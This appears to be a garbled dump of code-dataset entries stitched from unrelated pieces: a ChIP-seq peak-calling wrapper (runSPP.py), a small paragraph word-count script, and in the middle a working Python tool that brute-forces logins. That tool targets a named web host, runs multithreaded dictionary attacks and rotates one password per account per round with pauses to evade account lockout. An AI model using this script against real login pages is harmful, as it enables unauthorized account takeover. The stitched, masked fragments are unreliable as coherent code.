read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport subprocess\nimport collections\nfrom cgatcore import experiment as E\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], 
args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-5": "'''\nrunSPP.py - wrap spp peak caller\n========================================\n\n:Tags: Python\n\nPurpose\n-------\n\nRuns the spp peak caller.\n\nThe workflow follows the tutorial at:\n\nhttp://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html\n\nUsage\n-----\n\nDocumentation\n-------------\n\nRequirements:\n\n* spp >= ?\n* snow >= 0.3.13\n* bedtools >= 2.21.0\n\nCode\n----\n\n'''\n\nimport os\nimport sys\nimport subprocess\nimport collections\n\nfrom cgatcore import experiment as E\n\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n '''convert bam to bed with bedtools.'''\n\n statement = \"bamToBed -i %(infile)s > %(outfile)s\" % locals()\n\n E.debug(\"executing statement '%s'\" % statement)\n\n retcode = subprocess.call(statement,\n cwd=os.getcwd(),\n shell=True)\n if retcode < 0:\n raise OSError(\"Child was terminated by signal %i: \\n%s\\n\" %\n (-retcode, statement))\n\n return outfile\n\nSPPPeak = collections.namedtuple(\n \"SPPPeak\",\n \"contig unrefined_start unrefined_end strand \"\n \"posterior summit height refined_start refined_end median fdr\")\n\n\ndef iteratePeaks(infile):\n '''iterate of zinba peaks in infile.'''\n\n for line in infile:\n\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"PEAKID\\tChrom\"):\n continue\n # skip empty lines\n if line.startswith(\"\\n\"):\n continue\n\n data = line[:-1].split(\"\\t\")\n\n if len(data) != 12:\n raise ValueError(\"could not parse line %s\" % line)\n\n # I assume these are 1-based coordinates\n data[2] = max(int(data[2]) - 1, 0)\n # end\n data[3] = int(data[3])\n # posterior\n data[5] = float(data[5])\n # summit\n data[6] = max(int(data[6]) - 1, 0)\n # height\n data[7] = int(data[7])\n # refined_start\n data[8] = max(int(data[8]) - 1, 0)\n # end\n data[9] = int(data[9])\n # median\n data[10] = int(data[10])\n # qvalue\n data[11] = float(data[11])\n\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n\n if not argv:\n argv = sys.argv\n\n # setup command line parser\n parser = E.OptionParser(version=\"%prog version: $Id$\",\n usage=globals()[\"__doc__\"])\n\n parser.add_option(\"-f\", \"--input-format\", dest=\"input_format\",\n type=\"choice\",\n choices=(\"bam\",),\n help=\"input file format [default=%default].\")\n\n parser.add_option(\"-w\", \"--window-size\", dest=\"window_size\", type=\"int\",\n help=\"window size [default=%default].\")\n\n parser.add_option(\"-c\", \"--control-filename\",\n dest=\"control_filename\",\n type=\"string\",\n help=\"filename of input/control data in \"\n \"bed format [default=%default].\")\n\n parser.add_option(\"-t\", \"--threads\", dest=\"threads\", type=\"int\",\n help=\"number of threads to use [default=%default].\")\n\n parser.add_option(\"-q\", \"--fdr-threshold\",\n dest=\"fdr_threshold\", type=\"float\",\n help=\"fdr threshold [default=%default].\")\n\n parser.add_option(\"-z\", \"--spp-z-threshold\", dest=\"z_threshold\", type=\"float\",\n help=\"z threshold [default=%default].\")\n\n parser.add_option(\"--bin\", dest=\"bin\", type=\"int\",\n help=\"bin tags within the specified number \"\n \" of basepairs to speed up calculation;\"\n \" increasing bin size decreases the accuracy \"\n \"of the determined parameters [default=%default]\")\n\n parser.add_option(\"--spp-srange-min\", dest=\"srange_min\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be 
higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.add_option(\"--spp-srange-max\", dest=\"srange_max\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.set_defaults(\n input_format=\"bam\",\n threads=1,\n fdr_threshold=0.05,\n window_size=1000,\n offset=125,\n srange_min=50,\n srange_max=500,\n bin=5,\n z_threshold=3,\n )\n\n # add common options (-h/--help, ...) and parse command line\n (options, args) = E.start(parser, argv=argv)\n\n if len(args) != 2:\n raise ValueError(\n \"please specify a filename with sample data and an output file\")\n\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n\n # load Zinba\n R.library('spp')\n R.library('snow')\n\n # read data\n E.info(\"reading data\")\n R('''chip.data <- read.bam.tags('%s')''' % filename_sample)\n R('''input.data <- read.bam.tags('%s')''' % filename_control)\n R('''cluster = makeCluster( %i )''' % (options.threads))\n\n E.info(\"computing binding characteristics\")\n # get binding info from cross-correlation profile\n\n # srange gives the possible range for the size of the protected region;\n # srange should be higher than tag length; making the upper boundary too\n # high will increase calculation time\n\n # bin - bin tags within the specified number of basepairs to speed\n # up calculation; increasing bin size decreases the accuracy of\n # the determined parameters\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R('''binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);''' % locals())\n # print out binding peak separation distance\n options.stdout.write(\n \"shift\\t%i\\n\" % R('''binding.characteristics$peak$x''')[0])\n\n ##################################################\n ##################################################\n ##################################################\n E.info(\"plot cross correlation profile\")\n # plot cross-correlation profile\n R('''pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)''' %\n filename_output)\n R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')\n R('''plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");''')\n R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')\n R('''dev.off();''')\n\n E.info(\"selecting informative tags based on the binding characteristics\")\n # select informative tags based on the binding characteristics\n R('''chip.data <- select.informative.tags(\n chip.data,binding.characteristics);''')\n R('''input.data <- select.informative.tags(\n input.data,binding.characteristics);''')\n\n E.info(\"outputting broad peaks\")\n window_size, z_threshold = options.window_size, options.z_threshold\n R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))''' % locals())\n # write out in broadPeak format\n R('''write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")''' %\n filename_output)\n\n # binding detection parameters desired FDR (1%). 
Alternatively, an\n # E-value can be supplied to the method calls below instead of the\n # fdr parameter the binding.characteristics contains the optimized\n # half-size for binding detection window\n R('''detection.window.halfsize <- binding.characteristics$whs;''')\n\n # determine binding positions using wtd method\n E.info(\"determining binding positions using wtd method\")\n fdr = options.fdr_threshold\n R('''bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())\n options.stdout.write(\"detected_peaks\\t%i\\n\" % R(\n '''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])\n\n # output detected binding positions\n R('''output.binding.results(bp,\"%s.summit.txt\");''' % filename_output)\n\n R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())\n # output using narrowPeak format\n R('''write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")''' %\n filename_output)\n\n # write footer and output benchmark information.\n E.stop()\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
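The runSPP.py entry above shells out to bedtools through subprocess.call and checks the return code by hand. A minimal alternative sketch of that helper using subprocess.run from the standard library, which raises on a non-zero exit status by itself; it still assumes a bamToBed binary on the PATH and is illustrative only:

import subprocess

def bam_to_bed(infile, outfile):
    # check=True raises CalledProcessError on failure, replacing the manual
    # retcode test in the original bamToBed() wrapper.
    with open(outfile, "w") as out:
        subprocess.run(["bamToBed", "-i", infile], stdout=out, check=True)
    return outfile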
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep

MAX_ROUND = 3      # number of brute-force rounds
curr_round = 0     # current round
sleep_time = 2     # seconds to sleep after each round


def login_limit_user():
    """
    Attempt one login with the next (username, password) pair from the queue.
    """
    try:
        login_info = dict_queue.get(block=False)
    except Exception as e:
        print("[Error] {0}".format(repr(e)))
        return
    username = login_info[0]
    # If a password has already been found for this username, skip it
    if username in success_username:
        return
    password = login_info[1]
    # Attempt the login
    payload = {
        "username": username,
        "password": password,
    }
    print('Trying username: {}, password: {}'.format(username, password))
    # url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
    url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
    r = requests.post(url, data=payload)
    # Check whether the login succeeded
    if r.status_code == 200:
        msg = login_info
        # Marker text shown on the target page after a successful login
        success_str = "欢迎访问GentleCP的网站"
        if success_str in r.text:
            # On success, save the credentials to success_queue
            success_queue.put(msg)
            # Remember the username so its remaining passwords are skipped
            success_username.append(username)
            print("[INFO] success: ", msg)
            # To stop as soon as one password is found, call stop_brute() here
            # stop_brute()


def get_dict(dict_user, dict_pass):
    """
    Build the dictionary queue of (username, password) pairs.
    :return:
    """
    with open("dict/{}".format(dict_user)) as f:
        username = [line.strip() for line in f.readlines()]
    with open('dict/{}'.format(dict_pass)) as f:
        passwords = [line.strip() for line in f.readlines()]
    count = 0
    for u in username:
        # Each round moves on to the next password in the list
        p = passwords[curr_round % len(passwords)]
        count += 1
        pair = (u, p)
        dict_queue.put(pair)
    print("Dictionary built, length {}".format(count))


def get_parse() -> dict:
    parser = argparse.ArgumentParser()
    parser.add_argument("--username", "-u", help="username dictionary file")
    parser.add_argument("--password", "-p", help="password dictionary file")
    dic = vars(parser.parse_args())
    return dic


def print_result():
    """
    Print the brute-force results.
    """
    success = []
    while not success_queue.empty():
        success.append(success_queue.get())
    print("\n[INFO] results: ", success)


if __name__ == "__main__":
    args = get_parse()
    # argparse stores the values under 'username'/'password'; fall back to the
    # bundled dictionaries when the flags are omitted
    dict_username = args.get('username') or "username.txt"
    dict_password = args.get('password') or "password.txt"
    for curr_round in range(0, MAX_ROUND):
        print("[INFO] starting round {0}".format(curr_round))
        get_dict(dict_username, dict_password)
        bruteforce(login_limit_user, thread_num=5)
        print("[INFO] Sleep.")
        sleep(sleep_time)
    print_result()
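
# The bruteforce() helper imported from ba_bypass_bruteforce is not shown in
# this entry. The sketch below only illustrates the pattern it presumably
# implements (a fixed number of threads draining dict_queue); the name
# bruteforce_sketch and its behaviour are assumptions, not the module's real API.
import threading


def bruteforce_sketch(task, thread_num=5):
    def worker():
        # Each worker keeps calling task(); task() itself pops one
        # (username, password) pair per call and returns when the queue is empty.
        while not dict_queue.empty():
            task()
    threads = [threading.Thread(target=worker) for _ in range(thread_num)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()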
|
normal
|
{
"blob_id": "94286fc36e06598b9faa65d9e5759f9518e436c6",
"index": 7979,
"step-1": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-3": "<mask token>\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import os
import csv
import re
totWords = 0
wordLen = 0
totSentWithPunctuation = 0
sourceFile = os.path.join('Resources', 'paragraph_2.txt')
with open(sourceFile, 'r') as paragraph:
paragraph = paragraph.read().split("\n\n")
for sentence in paragraph:
# Remove punctuation from sentences
sentWithPunctuation = sentence
sentNoPunctuation = re.sub(r'[^\w\s]','',sentence)
#Split sentence with no punctuation by words using spaces
words = sentNoPunctuation.split(" ")
for word in words:
wordLen = wordLen + len(word)
# Compute totals for output message
totWords = totWords + len(words) # Total words for all sentences
avgSentLen_Words = round(totWords / len(paragraph),2) # Average words for all sentences
avgLetterCount = round(wordLen/totWords,2) # Average letter by word for all sentences
totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)
